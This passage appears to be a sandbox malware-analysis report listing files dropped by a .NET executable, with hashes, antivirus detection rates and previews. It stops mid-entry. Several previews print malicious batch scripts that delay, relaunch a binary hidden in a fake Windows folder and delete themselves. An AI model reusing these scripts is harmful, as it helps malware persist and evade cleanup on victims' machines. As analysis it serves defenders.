                                                  SHA1:F28E45AB2FE92A78DD9C8B49E3BEF8F9848F77FC
                                                  SHA-256:8F0E9AA53EC4AFDDE2618A0302E69C5D599846AF1A05D2629B037528F76C917C
                                                  SHA-512:263051E2B74898195D043B962935323CB1CEF52A696C4E8EDCA736B5EF83E97DC7C10E0B9BF416CEB47BCF671D4F12469673F3024BF58C33351096CDC26829B4
                                                  Malicious:false
                                                  Preview:OXnZJJaDhkDUuMC6kdR5bSj1aHHEzDWALPrpmLs5ZqEDlI58Suf6ZZU5xv9CCWOdOCIefXUYuVgvOfQSLJvEiakw5v11Mq2Dckzi9bd5aHLE2irReq03kJ5xcWitfdLEcdSnqsSuq0oaPg3WEjWf09cSoBGn2tZ75HlZQDkwXGNufei5cLp5GpOdAA9plp26aqfI5eGA8jItwsxJcLLqDd0P3IYPE5LsNQTy9a98Fo6gheqSMzNaeM26zPPxF16DYZgfZ8KCLMlYgUrYbGDPsuOBXW8tLM2Os3II8L2NoKPRkdZfi0V8xrVoKeHCAa08UWqnLjaPOzkhf7a46cLV04aBhd7dD0NOUR7OxwT9ZGu8HyINDNFhPfHZ6oGsl6MXlVNOAMGKIL5uKb4tUuazuq8yJhRIqlXc3WWvl4M0H5YDkWPeuXX0fWn5XYEc58ehyc1xEJHZhksyR5NxSwXTOh6hsbXM0u4Ia1PHfbalP7T5nyncLRKJkLSQfUEnv5jxpjXapGR0WwDROB34x5BjjviPi8lLWw0UXfQDaNwE9TwxHBCeaK0z39N3BI1qeGdj6t3suzdjJ6kP8vHh6GuL6AaYSWCSVFk20N0YHTtkrQq7Y74QAUuXVSm6SeaYxLODVsZv4tZmXKeqUd9UbwRBVMghk4Gm3VxgCmlqiJVR4HALx6lzfG6A3MsIL1L9nwtBW8or1SwSa9HNMUunTQHxYwmz4cfq8WoHY8zzS37MTok3Fe60HhpWp6njVyxZxGUEV9zNf5V

                                                  C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..

                                                  C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KPFv8ATDx0.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1698
                                                  Entropy (8bit):5.367720686892084
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                  MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                  SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                  SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                  SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\oqWNZWQNWoNnROlqjKcKhLM.exe.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1915
                                                  Entropy (8bit):5.363869398054153
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                  MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                  SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                  SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                  SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                  C:\Users\user\AppData\Local\Temp\1GlaBTLt9k

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.403856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:YGD6:Y66
                                                  MD5:12423759F238681F52AD176F567E40E5
                                                  SHA1:40EF697827FDFA092710BE4A9E31DA709E51C8B8
                                                  SHA-256:18F2C80E937F09B1FEE256FC28F8A64D58B785D6571D226FAB1B978B6E44B554
                                                  SHA-512:EF0013A355B0EB9A8AED9EECDF2D7510B95149464CE2029A37B09701DC0BA965B9BCD5594C012832AF6A0AD616046D39F045F18A586B4AD3C0CCF4119E1CF935
                                                  Malicious:false
                                                  Preview:YlbCauPgGBWN8RSk4u1OCrMbU

                                                  C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.33571833612795
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIw8Lq:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiX
                                                  MD5:9351F79BD1CD31E7FE87091950C7FD81
                                                  SHA1:4C66D52E5706CA78F2F62F8C1516E4D269860993
                                                  SHA-256:B0074EFED534C4CF700B424F00C7AC919F6AE718D0F719B9B0C0F7901A7140D2
                                                  SHA-512:65245A74D2EF54066930D5C39CF7AA3EEBAB3A44B9EA6977AC5CB5F2EC104F1E43A09E7B08C717F0FD9627A550F01618F33D9BC5DBB46DC20D0E81670D271AC1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4XCyKdTKaY.bat"

                                                  C:\Users\user\AppData\Local\Temp\51yavEShxN

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):3.943465189601647
                                                  Encrypted:false
                                                  SSDEEP:3:Wb6l8zUfYpcn:WbEMUfgc
                                                  MD5:69FC3AF6E59633BAF77E5A45DE32706B
                                                  SHA1:0730B030C456CC38B5D6D3967BB16A9961EF196F
                                                  SHA-256:CE8F1F6A358FD7D4FBC5DDF07D0DFFDBC6577E7638692B2DDED86BFCF8CAD7FA
                                                  SHA-512:3F6BA7EE4523BB98B4287E22A0B7AE25727D51777F4868B9C1A1751740E1341C7B03309D7B335A46D60C2845DC0C3FFDF0BF563C6B9850EC1B502DC279C8DE25
                                                  Malicious:false
                                                  Preview:qjAY46izyJQ5qbYnb1zzUNy1y

                                                  C:\Users\user\AppData\Local\Temp\6973u7blL4

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.4838561897747224
                                                  Encrypted:false
                                                  SSDEEP:3:bLqMmLTj01zn:nqM+0x
                                                  MD5:019371CE95C868CE12F1692784C44974
                                                  SHA1:3FB1F1BA100120627180E3F6F34E99FFCB955A7F
                                                  SHA-256:B097E79B17ACDF86394649B5F0451EA042AF2BA11C344E786AE1010AD77BEAE0
                                                  SHA-512:08D37D58DFA343EBC3728861FBA567414CF0420DE13ED3E21239E2E18351D3E9BCD86DADB6ADF08BE7D40DB217F946E60FB8E021C92CCEEF1E8484F01CB1EB1D
                                                  Malicious:false
                                                  Preview:s9dIecXYkACn68DI2rcyK5PNB

                                                  C:\Users\user\AppData\Local\Temp\Eee1q2H6Zy

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.213660689688185
                                                  Encrypted:false
                                                  SSDEEP:3:nxk7kh:xqs
                                                  MD5:ACCB27010CC20AE8E555D6E33DD8C65C
                                                  SHA1:46E3E9585C9B65E836C26322B3DECDC1478C1653
                                                  SHA-256:6BDE11F0EFA86E91E775C75E6C4B22F9CA746B145AE127F92EF38E763FB73186
                                                  SHA-512:0E68643E2B2FBB42E2A10577678AE48382FF0CC688A0CC87A3E89C3816F23D8DDF577A7E10168547A0719CE04DC482FF8802670A76E890B7B0DD676EA967FF15
                                                  Malicious:false
                                                  Preview:7HlEZuKHnNiGrv0rY8Q86rXlt

                                                  C:\Users\user\AppData\Local\Temp\GmrVH2RRtM

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.243856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:Hrn0hCzuzrrLA:LnTzuzro
                                                  MD5:A06A5BCB09E6F18756B196CA9B336971
                                                  SHA1:FE6CAF8EA3E36613A190B67AA65B9AA2BD8C2A2C
                                                  SHA-256:88C9784D1C0BE211E085978E29DB677EEB1CD9E0344FB7F9B64E10FA9E789004
                                                  SHA-512:075E53EFFF9FB844D97AD92DBBBE3E884BEE781D9B6408F85F980CFA083B45D51D73557F7F5791556140442CEB91BDB1BA1769EBA494BDEDA2F78B5926D18FCF
                                                  Malicious:false
                                                  Preview:u7NhPwbDgZvJpkraKVagNnZcJ

                                                  C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.373989033273579
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAItirC:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiC
                                                  MD5:009E987CF7BAF2447EA838E533DE9C0B
                                                  SHA1:DE325FDD0EA7F8205F970A28E8444EB519B362D4
                                                  SHA-256:4CDFF14857774B3D6F8052A66921E29A8F55FF88484768F39B843454F5388A27
                                                  SHA-512:C0BF8689605A41F395B2BFD4FA5BF82A44CB7E0795B010492928C6E4A193CF2670E9CBC1D7B4B19CD3E0363E69E553D36E4985B3D292AC25B9DE5FD302203DFC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\JRGN3N9ZXF.bat"

                                                  C:\Users\user\AppData\Local\Temp\RW8E5HpYwQ

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:MLgOLxbvh:xmp
                                                  MD5:89E29B3788226933F30A9E4F1D452931
                                                  SHA1:E8FE48A61A7D41ECCC54842596E10B887DF39BF3
                                                  SHA-256:B8208ABE65A7DCD911369E313DD538005A213F69BA3FB87EAF544492EA052B34
                                                  SHA-512:6333998F7BE3E65E4F7C5F743E31CCD4C9C39834C176B0DCBC650DA216C0A7993EC739C279C4BF0D440C60AF2228623C983509F22191F417A29882BE423B7CE9
                                                  Malicious:false
                                                  Preview:eESnrU4MnTsM4AEJhRXeW4Gez

                                                  C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.2763640749091785
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fNH:HTg9uYDEmetZ9
                                                  MD5:F1D4C7B9D1520A50BF3F2D7DB51081A0
                                                  SHA1:7DDBA09E69B3717095FB504642299AEF579EDC2D
                                                  SHA-256:8B307A8DEA799BEB1D0D9C40C72FDC112E1B812E6926EF0F2141FC4702DA8DAA
                                                  SHA-512:C30CB72130F8E1A159ED5AF037FF31DEF79DDE60711B4E91560F7A466D3922F3F73B35B83E329222B4507BB107FCC16F6506D639E96DCFD96FBDCE2D1565760B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TqMgut2j0M.bat"

                                                  C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.266309165832841
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fr:HTg9uYDEmetZz
                                                  MD5:97FEF771E61856E7C661189A8E050CD8
                                                  SHA1:C34A739A43DF40575EBE78CACC0B7F415D39EA1B
                                                  SHA-256:B97CC1CA4B88AD30D130222E235F84B2D8B1C0A44097AB3A3AFD2E01262137F2
                                                  SHA-512:89832893DEAD6458FCADEF26FF906AD033D464D30A73FBB6FE21434A8930CD1E88AED7AF44E135B39E32A55CF513B503747EA488E1DCFE3173E7393C719B65C9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aehWhM7TGU.bat"

                                                  C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.311365017257263
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fihX:HTg9uYDEmetZU
                                                  MD5:6781D41625272A6DF01C22E0A0243EB7
                                                  SHA1:4AA0B2FB06EECAFB982356875EBE34BE9B0F8490
                                                  SHA-256:6F31A54B3A1A2D71003249E966AD714CC8293E9030B7C81F057A990E1ED40F14
                                                  SHA-512:66516323EE697887667419DF37F127A1D9BD1B268E040DD2769217A999CFC6B6A69F1D45B346D504327EE56BE63430E8EA44527BE04E9DDA6DCCAEDE15E80565
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bgR6NVhjy4.bat"

                                                  C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.326693830912632
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIGO8q:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiG
                                                  MD5:8DC4E784351CA08A5907778C10380E30
                                                  SHA1:0B5F64D93FDEE5B3553FB570BEB560D33F2B00AB
                                                  SHA-256:D3507BE52E3963ADC959B3EF166A425B94EC5FB0768F17EC96D1293B20527B59
                                                  SHA-512:5708C869A6A0288273C4CF57875C98D78634BE7A7F0F9589D901F5F366E518A7930ADC36D2F3EB7C89450F3B1B078E1861788211C97C388D1671C6734650C5F7
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bqMLTwU6O8.bat"

                                                  C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.30674036394868
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIzJqK:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwiE
                                                  MD5:E12AC3439F0D54B0B56182F251906FD6
                                                  SHA1:7158CD0458B9275775C4E19BDAE8F143C9E01AA1
                                                  SHA-256:4417043C412548B747D396D326494C60719F7518A977DB14B4C63F9F808931B2
                                                  SHA-512:069823DA483207AB153C405DF05ADEDE61F7EC5E915C58AAC064A1AEDB7207E6833A1D74F24F384BAFF3A4E143C8EBFF17F376BC117AFA13D9E555DA96E05E7A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\cWXsH5vMZ0.bat"

                                                  C:\Users\user\AppData\Local\Temp\fdYSUxHhNe

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.103465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:5kQ0XsIKfVM5Gn:5Z0XvKfEGn
                                                  MD5:9171E60F21E43D93EA124BF28296781B
                                                  SHA1:53EEA48128B358E06BCD9860C718853C551E9BC9
                                                  SHA-256:59214E530D97969D7ECC2E1C03D64CA10AD4DFEEB1C88195A4BFB8271DDB3A1D
                                                  SHA-512:EB90ED16A171AFEE141D2398DAFE0F115A1CF31722918203F3000A75BF58E66A53D9F503F68C4A1E159704F4CF44D3C5C27D55074A1C5A09831B07A00AB15940
                                                  Malicious:false
                                                  Preview:P1sRAuQrI70Q1ojB0iiiXDY91

                                                  C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.274764413759756
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fln:HTg9uYDEmetZdn
                                                  MD5:6C9C3704937AA33EFAFADDD8AFA12331
                                                  SHA1:6B9F89D56669357AE1416A9C41DC6BE5165A9916
                                                  SHA-256:829FEC811ABF0B425E412EE7700F07617E5B99C3B04A49D67DAFDAF602E23519
                                                  SHA-512:F356DDCEE3D75988A408531022F1EFB59E781A4E202907A5A99A5AEEBCD245B53C3AF69A37950BA124D94C2E448C34DD402EFB737A4243B57391404D3E8FEDAA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\iHmrx8Dkeu.bat"

                                                  C:\Users\user\AppData\Local\Temp\ki5mgHFA5B

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.293660689688185
                                                  Encrypted:false
                                                  SSDEEP:3:pXWmmEiIn:pGmmEiIn
                                                  MD5:9CAAABEEDE4A26149A9617C760DBFB60
                                                  SHA1:057A575490077BED342CBE323A298AA5212A72E2
                                                  SHA-256:39333F1B3B11C6064B77DA32D4A5798E1500BD599AC6000F8A3D1181B97E78F2
                                                  SHA-512:4427E9184BB345D41A1ECB3345C5101EE4D5AE8B27518BBEFCB7D92F6FD7E91E905DCE23C8C177D758A982105C476DFBAC15A5F20349C4026E7DDE8ABD8AA399
                                                  Malicious:false
                                                  Preview:jQLQ9bRgsCF08YoYtTiQaGd8y

                                                  C:\Users\user\AppData\Local\Temp\mzahGM93Su

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.163856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:fwQfiun:flqun
                                                  MD5:45FDF9906FB6DB537839725E356712EA
                                                  SHA1:A3CA502F2B6F8FACBF5FD3D39CA4B47BF07C373F
                                                  SHA-256:D4FF12A57ED0E9F7FE85B562014042E1705DEA37A806D541EEA9EB0B3E49A5F8
                                                  SHA-512:2B873274771A8CDCC39E6D3E31273B2C62349EFA6C0EFCE39D50BA0C4D31ADF3F61BF6DE4808761E00ECC1FDBF15B203AEA705C7894EEA367CE2C47A4DA9846F
                                                  Malicious:false
                                                  Preview:RGannhpYMK5OCXMKyGXecrjAc

                                                  C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):231
                                                  Entropy (8bit):5.340005372299452
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wQTr/cTvKOZG1cNwi23fYZ:HTg9uYDEmetZgZ
                                                  MD5:9747DB10B7D370585B26D96E0F146974
                                                  SHA1:798E5294B1303F8FD0E9D84F47B5B15574FF20C7
                                                  SHA-256:043D88135A9AC79135286D7C93B8B6AA07DE6C53560D87D1A0FDD8A7C90BE2A6
                                                  SHA-512:C654224D1D9C0B53EFA8E465F0D7AF1465212E60C0E6769E82A91A1905AA32D99A37DE83B2A0E51B63AD5C6B6119D1666EEC1E4B530C3CB7EF245B687CA0E04B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\pFxSEGDzP3.bat"

                                                  C:\Users\user\AppData\Local\Temp\rmWrz5JDk6

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:Pm58n:PI8n
                                                  MD5:43CA6C01D9BF84333DEFC028CE62E283
                                                  SHA1:5878731B9014577469A4115F0A41F0A8D667658A
                                                  SHA-256:4D3006D6458E5AED44B89254BF530CC7D87F7B347557B3BA5431D8F7433D842C
